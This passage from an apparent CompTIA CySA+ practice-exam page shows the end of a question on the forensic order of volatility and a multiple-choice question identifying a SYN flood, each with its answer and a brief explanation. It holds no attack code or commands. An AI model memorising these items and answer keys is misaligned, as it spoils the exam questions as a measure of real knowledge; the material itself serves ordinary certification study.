D.Logs, disk, swap, RAM, CPU registers
AnswerB

This is the correct order of volatility.

Why this answer

The order of volatility dictates that volatile data in memory (CPU registers, RAM) is collected first, then less volatile data like swap, disk, and logs. The correct sequence is CPU registers, RAM, swap, disk, then logs.

825
MCQmedium

During a network traffic analysis, a security analyst observes repeated TCP SYN packets sent to a host that responds with SYN-ACK, but the connection never completes. What type of anomaly is this?

A.DNS amplification
B.SYN flood
C.ARP spoofing
D.Port scan
AnswerB

Repeated SYNs without final ACK indicate a SYN flood DoS attack.

Why this answer

A half-open TCP handshake (SYN flood) is a common DoS technique where the attacker sends many SYN packets without completing the handshake, exhausting server resources.

Page 10

Page 11 of 14

Page 12
CompTIA CySA+ CS0-003 CS0-003 Questions 751–825 | Page 11/14 | Courseiva